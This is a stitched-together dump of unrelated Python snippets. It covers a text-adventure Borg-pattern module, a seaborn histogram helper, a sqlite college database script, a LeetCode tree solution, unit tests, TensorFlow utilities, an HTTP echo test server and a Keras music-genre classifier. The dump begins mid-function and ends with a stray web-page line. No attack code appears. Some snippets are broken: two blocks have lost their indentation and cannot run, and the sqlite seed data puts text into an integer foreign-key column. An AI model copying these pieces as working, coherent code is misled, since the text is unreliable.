    # Backed by the package-wide default; see set_n_jobs() for the setter.
    return defaults.N_PROCESSES
def set_n_jobs(n_jobs):
    """
    Set the number of jobs to use for parallel processing.
    :param n_jobs: The number of jobs to use for parallel processing.
    :type n_jobs: int
    :return: None
    :rtype: None
    """
    # Mutates the package-wide default read by get_n_jobs().
    defaults.N_PROCESSES = n_jobs
|
from constants import DEFAULT_LOCATION_DESCRIPTION
class Environment:
    """Represent the game's environment; physical and historical.

    Borg pattern: every Environment() instance aliases one shared state
    dict, so all instances see the same item list.
    """
    _shared_state = {"items": []}

    def __init__(self):
        # Borg: alias, don't copy, the shared state.
        self.__dict__ = self._shared_state

    def best_match(self, itemname):
        """
        Return the best match for a given item's name.
        :param itemname: The requested name of the item.
        :returns: The best-match object for that item name, or the name
            itself when nothing nearby matches.
        """
        # Todo: decide how it's really gonna be the "best" match.
        candidates = (
            item
            for item in self.nearby_items
            if item.name in itemname or itemname in item.name
        )
        return next(candidates, itemname)
        # raise ValueError("Haven't got one of those.")

    @property
    def nearby_items(self):
        """
        Given the player's current location and attributes, yield from the
        list of nearby items.
        :returns: Yields from all nearby items.
        """
        # Todo: list *nearby* items; not just all items.
        yield from self.items

    @property
    def description(self):
        """
        Return a description of the player's current whereabouts.
        :return: A description as above.
        """
        # Todo: Dynamically generate a description of the player's whereabouts.
        visible = list(self.nearby_items)
        if not visible:
            return "You can't see anything around you."
        listing = "; ".join(map(str, visible))
        return DEFAULT_LOCATION_DESCRIPTION + "\nNear you: \n" + listing
class Player:
    """Represent the current player (Borg pattern: all instances share state).

    Dynamic flag protocol via __getattr__:
      - ``player.is_foo``      -> current value of the ``_foo`` flag
      - ``player.set_foo()``   -> sets ``_foo`` to True
      - ``player.unset_foo()`` -> sets ``_foo`` to False
    """
    _shared_state = {"context_objects": None}

    def __init__(self):
        # Borg: alias, don't copy, the shared state.
        self.__dict__ = self._shared_state

    def __getattr__(self, name):
        # Bug fix: the old code used name.replace("is", "") etc., which
        # removes EVERY occurrence of the substring — e.g. "is_raised"
        # looked up "_raed" while "set_raised" stored "_raised", so the
        # flag could never be read back.  Strip only the leading prefix.
        if name.startswith("is_"):
            return getattr(self, "_" + name[len("is_"):], False)
        elif name.startswith("set_"):
            return lambda: setattr(self, "_" + name[len("set_"):], True)
        elif name.startswith("unset_"):
            return lambda: setattr(self, "_" + name[len("unset_"):], False)
        # NOTE(review): returning None (rather than raising AttributeError)
        # means getattr(..., False) above falls through to None for flags
        # that were never set; preserved as-is since callers may rely on it.
        return None
# Module-level singletons; thanks to the Borg pattern any further
# Player()/Environment() constructed elsewhere shares the same state.
player = Player()
environment = Environment()
|
import requests
class BadRequest(requests.exceptions.HTTPError):
    """
    Represents a detailed error message from a web server.
    """
    def __str__(self) -> str:
        # Append the HTTP status code to the base HTTPError message.
        base_message = super().__str__()
        status = self.response.status_code
        return f'{base_message} (status: {status})'
|
# coding: utf-8
import matplotlib.pyplot as plt
import seaborn as sns
class HistgramCreator():
    """Interactive histogram figure (matplotlib + seaborn).

    Right-clicking inside the figure re-draws a histogram of the data
    series currently selected in the parent GUI's widgets.  (Name keeps
    the original "Histgram" spelling for compatibility with callers.)
    """
    def __init__(self, parent, figure_num):
        # parent: GUI object exposing x_data_box, *_cmbbox widgets,
        # status_bar_str and dict_data_frame — assumed from usage below;
        # confirm against the caller.
        self.fig, self.axes = plt.subplots()
        self.parent = parent
        self.data_list = []
        self.data_name_list = []
        self.color_list = []
        # Redraw on mouse clicks inside this figure.
        self.fig.canvas.mpl_connect('button_press_event', self.on_click)
        self.figure_num = figure_num
        self.axes.grid(True)
        # Brief pause lets the figure render without blocking the GUI.
        plt.pause(0.00001)
    def on_click(self, event):
        """Handle a mouse click; button 3 (right click) triggers a redraw."""
        if event.button == 3:
            # set axis equal or not
            if self.parent.equal_list_cmbbox.get() == 'ON':
                self.axes.axis('equal')
            # no data is selected
            if not self.parent.x_data_box.get():
                self.parent.status_bar_str.set('Select data from Data List')
            else:
                self.create_histgram()
    def create_histgram(self):
        """Plot a seaborn histogram of the selected "<group>,<column>" series."""
        # Selection string has the form "<group>,<column>".
        x_group_data_name = self.parent.x_data_box.get().split(',')
        x_group_name = x_group_data_name[0]
        x_data_name = x_group_data_name[1]
        x_data = self.parent.dict_data_frame[x_group_name][x_data_name]
        color = self.parent.color_list_cmbbox.get()
        # KDE overlay is on unless the combo box explicitly says 'OFF'.
        if self.parent.hist_kde_list_cmbbox.get() == 'OFF':
            is_kde_enable = False
        else:
            is_kde_enable = True
        # distplot returns the axes it drew on; keep it for later redraws.
        self.axes = sns.distplot(x_data, color=color, kde=is_kde_enable)
        plt.pause(0.00001)
import sqlite3
db = sqlite3.connect('college.db')

# Drop leftovers first so the script can be re-run from scratch.
for _table in ("stud", "dept", "courses", "fac", "res"):
    db.execute("DROP TABLE IF EXISTS " + _table)

# Schema: students, departments, courses, faculty and results.
db.execute("CREATE TABLE stud(id INTEGER PRIMARY KEY AUTOINCREMENT,depart VARCHAR(10),course VARCHAR(10),year VARCHAR(10),name VARCHAR(15),addr VARCHAR(10),city VARCHAR(10),mobile VARCHAR(11),email VARCHAR(15))")
db.execute("CREATE TABLE dept(id INTEGER PRIMARY KEY AUTOINCREMENT,depart VARCHAR(10))")
db.execute("CREATE TABLE courses(id INTEGER PRIMARY KEY AUTOINCREMENT,course VARCHAR(10))")
db.execute("CREATE TABLE fac(id INTEGER PRIMARY KEY AUTOINCREMENT,name VARCHAR(15),mobile VARCHAR(10),dept_id INTEGER,course VARCHAR(10),position VARCHAR(10),FOREIGN KEY (dept_id) REFERENCES dept(id),FOREIGN KEY (course) REFERENCES courses(course))")
db.execute("CREATE TABLE res(id INTEGER PRIMARY KEY AUTOINCREMENT,stud_id INTEGER,year VARCHAR(10),score VARCHAR(10),FOREIGN KEY(stud_id) REFERENCES stud(id))")

# Seed data: three departments/courses/faculty/results and five students,
# identical to the original literal INSERT statements.
db.executemany("INSERT INTO dept VALUES (NULL,?)",
               [('Dept1',), ('Dept2',), ('Dept3',)])
db.executemany("INSERT INTO courses VALUES (NULL,?)",
               [('Course1',), ('Course2',), ('Course3',)])
db.executemany(
    "INSERT INTO fac VALUES (NULL,?,?,?,?,?)",
    [('Name%d' % n, 'Mobile%d' % n, 'Dept%d' % n, 'Course%d' % n, 'Position%d' % n)
     for n in (1, 2, 3)])
db.executemany(
    "INSERT INTO res VALUES (NULL,?,?,?)",
    [(n, 'Year%d' % n, 'Score%d' % n) for n in (1, 2, 3)])
db.executemany(
    "INSERT INTO stud VALUES (NULL,?,?,?,?,?,?,?,?)",
    [('Dept' + i, 'Course' + i, 'Year' + i, 'Name' + i, 'Addr' + i,
      'City' + i, 'Mobile' + i, 'Email' + i) for i in "12345"])
db.commit()
db.close()
"""
Time Complexity = O(N)
Space Coomplexity = O(W)
"""
from collections import deque
class Solution:
    def getTargetCopy(self, original: TreeNode, cloned: TreeNode, target: TreeNode) -> TreeNode:
        """Return the node in *cloned* corresponding to *target* in *original*.

        Strategy: BFS over *original*, counting nodes until *target* is
        reached; then BFS over *cloned* in the same order, decrementing the
        count — the node at which the count reaches zero occupies the same
        BFS position as *target*.

        NOTE(review): assumes TreeNode (.left/.right/.val) is supplied by
        the judge environment and that *cloned* is a structural copy of
        *original* — confirm before reusing elsewhere.
        """
        # Defensive: nothing to search.
        if not original or not cloned:
            return None
        # Pass 1: count BFS steps in the original tree up to target.
        queue = deque()
        queue.append(original)
        count = 0
        while queue:
            node = queue.popleft()
            count += 1
            if node == target:
                break
            if node.left:
                queue.append(node.left)
            if node.right:
                queue.append(node.right)
        # Pass 2: replay the same BFS order on the clone; the matching
        # position (count hits 0) holds the answer.  The value comparison
        # guards against a positional mismatch.
        queue2 = deque()
        queue2.append(cloned)
        while queue2:
            node = queue2.popleft()
            count -= 1
            if node.val == target.val and count == 0:
                return node
            if node.left:
                queue2.append(node.left)
            if node.right:
                queue2.append(node.right)
from unittest import TestCase
import unittest
from ugly_number import Solution
class TestSolution(TestCase):
    """Unit tests for Solution.isUgly (from ugly_number)."""

    def setUp(self):
        # Fresh Solution per test, created by the unittest framework.
        self.sol = Solution()

    def test_uglyNumberCase1(self):
        self.assertEqual(self.sol.isUgly(8), True)

    def test_uglyNumberCase2(self):
        self.assertEqual(self.sol.isUgly(7), False)

    def test_uglyNumberCase3(self):
        self.assertEqual(self.sol.isUgly(40), True)
# Run the tests when this file is executed directly.
if __name__ == '__main__':
    unittest.main()
# pylint: disable = C0103, C0111, C0301, R0913, R0903, R0914, E1101
from __future__ import division

import os
import pickle  # needed by save_hparams/read_hparams/load_if_pickled/save_to_pickle
import shutil

# import cPickle as pickle
import tensorflow as tf
def get_trainable_vars(scope_name):
    """Return the trainable TF variables collected under *scope_name*."""
    train_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope_name)
    return train_vars
def print_hparams(hparams):
    """Print all hyperparameter key/value pairs, sorted by key.

    NOTE(review): the Python-2 print statements below are commented out,
    so this function currently computes the sorted keys and prints
    nothing — confirm whether it should be re-enabled with print().
    """
    hparam_values = hparams.values()
    keys = sorted(hparam_values.keys())
    # print ''
    # for key in keys:
    #     print '{} = {}'.format(key, hparam_values[key])
    # print ''
def save_hparams(hparams):
    """Pickle *hparams* to <hparams.hparams_dir>/hparams.pkl.

    Bug fix: the old string concatenation (hparams.hparams_dir +
    'hparams.pkl') silently produced a wrong path unless hparams_dir
    ended with a separator; os.path.join handles both cases.
    """
    pkl_filepath = os.path.join(hparams.hparams_dir, 'hparams.pkl')
    with open(pkl_filepath, 'wb') as f:
        pickle.dump(hparams, f)
def read_hparams(pkl_filepath):
    """Load and return a pickled hparams object from *pkl_filepath*."""
    with open(pkl_filepath, 'rb') as pkl_file:
        return pickle.load(pkl_file)
def get_ckpt_path(ckpt_dir):
    """Return the absolute path of the latest checkpoint in *ckpt_dir*,
    or None when no valid checkpoint state exists."""
    ckpt_dir = os.path.abspath(ckpt_dir)
    state = tf.train.get_checkpoint_state(ckpt_dir)
    if not (state and state.model_checkpoint_path):
        return None
    return os.path.join(ckpt_dir, state.model_checkpoint_path)
def try_restore(hparams, sess, model_saver):
    """Restore model variables from the latest checkpoint, if one exists.

    :param hparams: hyperparameters; only hparams.ckpt_dir is read here.
    :param sess: TF session to restore variables into.
    :param model_saver: a TF saver whose restore() is called.
    :return: the training iteration parsed from the checkpoint filename,
        or -1 when no checkpoint was found.
    """
    # Attempt to restore variables from checkpoint
    ckpt_path = get_ckpt_path(hparams.ckpt_dir)
    if ckpt_path: # if a previous ckpt exists
        model_saver.restore(sess, ckpt_path)
        # Checkpoint filenames end in "-<iteration>"; recover that number.
        init_train_iter = int(ckpt_path.split('/')[-1].split('-')[-1])
        # print 'Succesfully loaded model from {0} at train_iter = {1}'.format(ckpt_path, init_train_iter)
    else:
        # print 'No checkpoint found'
        init_train_iter = -1
    return init_train_iter
def set_up_dir(directory, clean=False):
    """Ensure *directory* exists; with clean=True, empty it first.

    Bug fix: the old code removed an existing directory when clean=True
    but never recreated it, so callers were left without the directory
    they asked for.
    """
    if os.path.exists(directory):
        if clean:
            shutil.rmtree(directory)
            os.makedirs(directory)
    else:
        os.makedirs(directory)
def get_optimizer(hparams, lr):
    """Build the TF optimizer named by hparams.opt_type for learning rate *lr*.

    opt_param1/opt_param2 feed momentum / decay / beta parameters where
    the chosen optimizer needs them.
    """
    opt_type = hparams.opt_type
    if opt_type == 'sgd':
        return tf.train.GradientDescentOptimizer(lr)
    elif opt_type == 'momentum':
        return tf.train.MomentumOptimizer(lr, hparams.opt_param1)
    elif opt_type == 'rmsprop':
        return tf.train.RMSPropOptimizer(lr, decay=hparams.opt_param1)
    elif opt_type == 'adam':
        return tf.train.AdamOptimizer(lr, beta1=hparams.opt_param1, beta2=hparams.opt_param2)
    elif opt_type == 'adagrad':
        return tf.train.AdagradOptimizer(lr)
    raise Exception('Optimizer {} not supported'.format(hparams.opt_type))
def load_if_pickled(pkl_filepath):
"""Load if the pickle file exists. Else return empty dict"""
if os.path.isfile(pkl_filepath):
with open(pkl_filepath, 'rb') as pkl_file:
data = pickle.load(pkl_file)
else:
data = {}
return data
def save_to_pickle(data, pkl_filepath):
    """Pickle *data* to *pkl_filepath*, overwriting any existing file."""
    with open(pkl_filepath, 'wb') as out_file:
        pickle.dump(data, out_file)
|
#!env python3
# -*- coding: utf-8 -*-
import threading
from socketserver import ThreadingMixIn
from http.server import BaseHTTPRequestHandler, HTTPServer
class TestServer(BaseHTTPRequestHandler):
    """Minimal echo handler used to inspect incoming HTTP requests.

    GET echoes the request path; POST echoes the request body.  All
    request headers are printed to stdout.
    """

    def handle_headers(self):
        """Dump all request headers to stdout and send a 200 response."""
        for k, v in self.headers.items():
            print(k , ":" ,v)
        # NOTE(review): closing rfile here discards any unread request
        # body — do_POST works only because it reads the body first.
        self.rfile.close()
        self.send_response(200)
        self.end_headers()

    def do_GET(self):
        # Echo the request path back to the client.
        self.handle_headers()
        self.wfile.write(bytes(self.path, "utf-8"))

    def do_POST(self):
        # Read the body *before* handle_headers() closes rfile.
        content_length = int(self.headers['Content-Length'])
        post_data = self.rfile.read(content_length)
        self.handle_headers()
        self.wfile.write(post_data)
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
    """HTTP server that handles each request in its own thread."""
    pass
httpd = ThreadedHTTPServer(("0.0.0.0", 8000), TestServer)
try:
httpd.serve_forever()
except KeyboardInterrupt:
pass
httpd.server_close()
|
import numpy as np
import librosa
from tensorflow.keras.models import load_model
import warnings
warnings.filterwarnings('ignore')
# Path of the audio clip to classify.
test_music = './project/mini/data/country.6.mp3'
y, sr = librosa.load(test_music)
# Mel spectrogram in dB, forced to the model's fixed 128x660 input size.
mel_spect = librosa.feature.melspectrogram(y=y, sr=sr, n_fft=2048, hop_length=1024)
mel_spect = librosa.power_to_db(mel_spect, ref=np.max)
if mel_spect.shape[1] != 660:
    mel_spect.resize(128,660, refcheck=False)
# power_to_db (ref=max) yields values in [-80, 0]; dividing by -80 maps to [0, 1].
test_data = mel_spect.reshape(1, 128, 660, 1) / -80
print(test_data.shape)
model = load_model('./project/mini/data/genre_model_resnet50_0.6521.hdf5')
print(model.predict(test_data))
# Index of the highest-probability class.
label_number = np.argmax(model.predict(test_data), axis=1)
print(label_number[0])
# Class-index -> genre-name mapping; must match the model's training labels.
label_dict = {
    0:'hiphop',
    1:'rock',
    2:'pop',
    3:'folk',
    4:'electronic',
    5:'jazz',
    6:'blues',
    7:'classical',
    8:'reggae',
    9:'disco',
    10:'country',
    11:'ballad',
    12:'dance'
}
print(label_dict.get(label_number[0]))
print(test_music.split('/')[-1], '의 장르는', label_dict.get(label_number[0]), '입니다!!')
print(np.round(model.predict(test_data)[0][label_number][0] * 100, 2) , "% 으로 예상됩니다.")
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.